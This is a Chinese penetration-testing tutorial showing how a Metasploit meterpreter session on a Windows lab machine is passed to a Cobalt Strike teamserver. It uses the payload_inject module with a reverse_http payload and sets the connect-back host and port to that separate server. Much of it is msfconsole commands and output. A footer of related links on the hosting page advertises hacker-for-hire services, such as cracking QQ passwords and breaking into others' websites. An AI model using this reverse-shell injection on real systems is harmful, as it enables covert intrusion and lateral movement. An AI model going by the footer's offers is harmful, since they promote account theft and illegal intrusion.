Metasploit如何派生一个shell给cobaltstrike

访客5年前黑客资讯1170

  Cobaltstrike作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。

  cobaltstrike3新版的已经摒弃了metasploit,重写了所有的功能,但是鉴于metasploit功能的强大,cobaltstrike仍然保留了对metasploit的接口,今天我们不聊其他的,

  只聊当我们使用metasploit获取到shell之后如何派生一个新的shell给cobaltstrike。系列参考我在安全脉搏上的:Cobalt strike browser pivot的应用实例

  实验环境:

  目标机器:windows server 2012 IP:192.168.81.150

  metasploit机器:mac osx IP:192.168.1.103

  cobaltstrike 机器:ubuntu 15.10 IP:192.168.81.135

  首先,我们通过其他的途径,使用metasploit在payload在目标机器上获取了一个meterpreter:

  cobaltstrike1

  进入我们获取到的meterpreter中

  cobaltstrike2

  由于在metasploit的一些局限性和操作的不便利性,我们需要把metasploit获取到的shell派生出来一个新的shell,转交给cobaltstrike,方便我们协同渗透

  在ubuntu机器上建立一个teamserver,然后本地链接,(仅仅为了演示,实际渗透中teamserver和client分开)

  user@ubuntu:/pentest/exploits/framework3/cobaltstrike$ sudo https://www.secpulse.com/archives/teamserver 192.168.81.135 *** *** ***

  [*] Generating X509 certificate and keystore (for SSL)

  [+] Team server is up on 50050

  [*] SHA1 hash of SSL cert is: d59e4862132ac9033c8f91216148bfd6d1049803

  启动客户端链接,这里我们需要建立一个新的监听器:

  cobaltstrike3

  ok,接下来,我们开始把macos上由metasploit获取的shell派生出一个新的shell转交给cobaltstrike,这里我们需要用到一个exploit: exploit/windows/local/payload_inject

  这个exploit是注入一个新的payload到当前的session里面,我们看下具体的操作

  exploit/windows/local/payload_injectmsfexploit(web_delivery) > use exploit/windows/local/payload_inject

  msfexploit(payload_inject) > show options

  

  Module options (exploit/windows/local/payload_inject):

  Name Current Setting Required Description

  ---- --------------- -------- -----------

  NEWPROCESS false no New notepad.exe to inject to

  PID no Process Identifier to inject of process to inject payload.

  SESSION yes The session to run this module on.

  Exploit target:

  

  Id Name

  -- ----

  0 Windows

  

  msfexploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http

  PAYLOAD=> windows/meterpreter/reverse_http

  msfexploit(payload_inject) > set DisablePayloadHandler true

  DisablePayloadHandler=> true

  msfexploit(payload_inject) > set LHOST 192.168.81.135

  LHOST=> 192.168.81.135

  msfexploit(payload_inject) > set LPORT 8880

  LPORT=> 8880

  msfexploit(payload_inject) > set SESSION 1

  SESSION=> 1

  msfexploit(payload_inject) > exploit

  

  [*]Launching notepad.exe...

  [*]Preparing 'windows/meterpreter/reverse_http' for PID 3916

  msfexploit(payload_inject) >

  

  这里我解释一下这些参数,

  由于cobaltstrike的监听器我们使用的是:windows/beacon_http/reverse_http,所以我们的payload也要使用:

  PAYLOAD windows/meterpreter/reverse_http

  设置本地监听ip和端口,由于我们的监听器是cobaltstrike的,所以要用到cobaltstrike机器的ip和端口

  默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,这里我们设置

  set DisablePayloadHandler true

  设置我们的当前session,执行,看看ubuntu机器上的cobaltstrike是否已经接受了我们由metasploit派生出来的shell。

  cobaltstrike4

  ok,ubuntu机器192.168.81.135上cobaltstrike已经有了一个新的shell,是由Mac主机192.168.1.103派生出来的新的,转交给cobaltstrike的。

  在渗透过程中,不要仅限于单一模式的思路,根据实际的情况,选择更优的 *** 来进行下一步的渗透测试。

  【原创作者:Sh@doM 授权投稿安全脉搏 安全脉搏 分享技术悦享品质】

相关文章

黑客代表字母(黑客电脑上的字母是什么)

黑客代表字母(黑客电脑上的字母是什么)

本文目录一览: 1、黑克是什么? 2、“K”客;闪客;黑客是什么意思? 3、黑客,红客,白客,骇客,蓝客,灰客,极客,他们分别是干什么的? 4、黑客是什么意思 黑克是什么? 提起黑客,总...

渗透技术再升级:如何利用HTML注入泄漏用户数据-黑客接单平台

本文首要详细分析了我怎么从头发现一种缝隙运用技能,成功绕过现有的缓解办法,对方针产生了适当有限的影响,并取得了5位数的奖金。 启示:一个古怪的HTML注入事例 André Baptista和Cache...

cn域名价格(三数字CN域名一口价行情)

cn域名价格(三数字CN域名一口价行情)

.cn的域名是怎么收费的?根据聚名网的数据显示,.cn域名新用户仅需26元,续费价格是42元/首年。 .cn域名是由我国管理的国家顶级域名。.cn代表中国,是具有中国独特标识的域名。当前.cn域...

华夏黑客联盟官网,找黑客师傅破解qq密码,网站账号冻结找黑客

Already registered?<a href="/static/login.html">Click Here to Login</a>随意看了下几个 PHP,发现一个盲...

菜鸟大神黑客建造东西(菜鸟专家黑客的建筑)

菜鸟大神黑客建造东西(菜鸟专家黑客的建筑)

本文目录一览: 1、如何创建一个黑客组织? 2、有电脑大神黑客大神什么的懂的买来源码,自己搭建服务器,自己租服务器自己弄吗 3、黑客是什么,能做什么 如何创建一个黑客组织? 1、首先你不是个...

专业黑客先做事后付款接单的平台

当然有了,但是偷qq,盗微信之类的事儿,我是做不了的。我只能渗透别人的有漏洞的网站。有需要的话,给我百度留言吧。 有些是私人搭建在境外的服务器,后台上面基本可以预设控制结果,你把网站地址给我,我看看能...